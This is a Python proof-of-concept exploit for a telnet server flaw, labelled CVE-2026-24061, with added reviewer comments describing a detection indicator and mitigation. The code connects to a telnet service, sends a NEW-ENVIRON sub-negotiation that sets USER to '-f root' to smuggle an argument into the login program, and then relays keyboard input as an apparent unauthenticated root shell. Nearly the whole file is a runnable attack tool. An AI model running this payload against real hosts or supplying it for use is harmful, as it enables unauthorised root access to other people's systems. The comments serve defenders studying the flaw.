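#!/usr/bin/env python
# CVE-2026-24061 PoC (USER="-f root" telnet -a 127.0.0.1 23)
# By @opscur (https://github.com/0p5cur)
#
# Reviewer notes (defensive reading of this file):
#   * The only request-specific bytes the client sends are one telnet
#     NEW-ENVIRON (option 39, RFC 1572) sub-negotiation that sets the
#     environment variable USER to the string "-f root".  Everything after
#     that is plain interactive I/O.
#   * Network-visible indicator: a NEW-ENVIRON sub-negotiation in which the
#     value of USER begins with "-".  A legitimate user name has no reason
#     to start with a dash, so this is a narrow pattern to alert on.
#   * Mitigation: run a telnetd build that contains the fix for this CVE, or
#     take the service off the network.  Presumably the server-side fix has
#     to refuse or neutralise a USER value that starts with "-" before it
#     reaches the login program's argument list -- confirm against the
#     vendor advisory.
import argparse
import os
import socket
import sys
import threading
import time

# Telnet command bytes (RFC 854).
IAC = 255
DONT = 254
DO = 253
WONT = 252
WILL = 251
SB = 250
SE = 240

# NEW-ENVIRON option code (RFC 1572); the only option this client accepts.
NEW_ENVIRON = 39


def negotiate(sock, data):
    """Strip telnet commands from *data* and answer option requests.

    Every ``DO <opt>`` other than NEW-ENVIRON is answered with ``WONT <opt>``
    and every ``WILL <opt>`` with ``DONT <opt>``; ``DONT``/``WONT`` get no
    reply.  Sub-negotiations are skipped.  An escaped data byte (``IAC IAC``)
    is emitted as a single 0xff, as RFC 854 requires.

    Args:
        sock: object with a ``sendall(bytes)`` method, used for the replies.
        data: raw bytes read from the connection.

    Returns:
        The bytes of *data* that are not part of a telnet command.

    A command cut off at the end of *data* is dropped, not carried over to
    the next call, so output can lose bytes when a command straddles two
    reads.
    """
    stream = bytearray(data)  # yields ints on both Python 2 and 3
    end = len(stream)
    clean_output = bytearray()
    i = 0
    while i < end:
        if stream[i] != IAC:
            clean_output.append(stream[i])
            i += 1
            continue
        if i + 1 >= end:
            break  # lone IAC at the end of the buffer
        cmd = stream[i + 1]
        if cmd in (DO, DONT, WILL, WONT):
            if i + 2 >= end:
                break  # option byte missing
            opt = stream[i + 2]
            if cmd == DO and opt != NEW_ENVIRON:
                sock.sendall(bytes(bytearray([IAC, WONT, opt])))
            elif cmd == WILL:
                sock.sendall(bytes(bytearray([IAC, DONT, opt])))
            i += 3
        elif cmd == SB:
            # NOTE: stops at the first bare SE byte, not at "IAC SE"; a
            # sub-negotiation payload containing 0xf0 ends the skip early.
            j = i + 2
            while j < end and stream[j] != SE:
                j += 1
            i = j + 1
        elif cmd == IAC:
            # IAC IAC is a literal 0xff data byte, not a command.
            clean_output.append(IAC)
            i += 2
        else:
            i += 2  # two-byte command without an option, ignored
    return bytes(clean_output)


def reader(s):
    """Copy server output from socket *s* to stdout until the link drops.

    Runs in a background thread.  When the peer closes the connection the
    whole process is terminated with ``os._exit(0)`` so that the main thread,
    blocked on stdin, does not keep the program alive.  A socket or stdout
    error just ends the loop.
    """
    while True:
        try:
            data = s.recv(4096)
            if not data:
                # os._exit() skips the interpreter's normal flush of
                # buffered output, so push pending text out first.
                sys.stdout.flush()
                os._exit(0)
            text = negotiate(s, data)
            if text:
                if sys.version_info[0] >= 3:
                    sys.stdout.buffer.write(text)
                else:
                    sys.stdout.write(text)
                sys.stdout.flush()
        except (socket.error, OSError):
            # Only I/O failures end the loop; the bare "except:" used here
            # before also hid programming errors.
            break


def exploit(target, port):
    """Connect to *target*:*port*, send the USER value and relay stdin.

    Args:
        target: host name or IPv4 address of the telnet service.
        port: TCP port of the telnet service.

    The socket is closed on every exit path.
    """
    print("[+] Connecting to " + str(target) + ":" + str(port) + "...")
    s = None  # bound before the try so the cleanup below is always safe
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target, port))
        s.settimeout(None)
        # IAC WILL NEW-ENVIRON, then
        # IAC SB NEW-ENVIRON IS VAR "USER" VALUE "-f root" IAC SE
        s.sendall(b'\xff\xfb\x27\xff\xfa\x27\x00\x00USER\x01-f root\xff\xf0')
        t = threading.Thread(target=reader, args=(s,))
        t.daemon = True
        t.start()
        time.sleep(1)
        # NOTE(review): reader() ends the process itself when the server
        # closes the connection, so this branch is only reached when the
        # reader thread stopped on an I/O error.  The message is therefore
        # not a dependable "patched" verdict when checking a fixed host.
        if not t.is_alive():
            print("[-] The target does not seem vulnerable")
            return
        while True:
            cmd = sys.stdin.readline()
            if not cmd:
                break
            s.sendall(cmd.encode() if sys.version_info[0] >= 3 else cmd)
    except (socket.error, OSError):
        # socket.timeout and ConnectionRefusedError are subclasses of these
        # on Python 3; on Python 2 the name ConnectionRefusedError does not
        # exist and naming it here raised NameError instead of this message.
        print("[-] The target seems to be unreachable")
    except KeyboardInterrupt:
        pass
    finally:
        if s is not None:
            s.close()


def main():
    """Parse ``target`` and the optional ``port`` (default 23), then run."""
    parser = argparse.ArgumentParser()
    parser.add_argument("target")
    parser.add_argument("port", type=int, default=23, nargs='?')
    args = parser.parse_args()
    print("[+] POC by @opscur (https://github.com/0p5cur)")
    exploit(args.target, args.port)


if __name__ == "__main__":
    main()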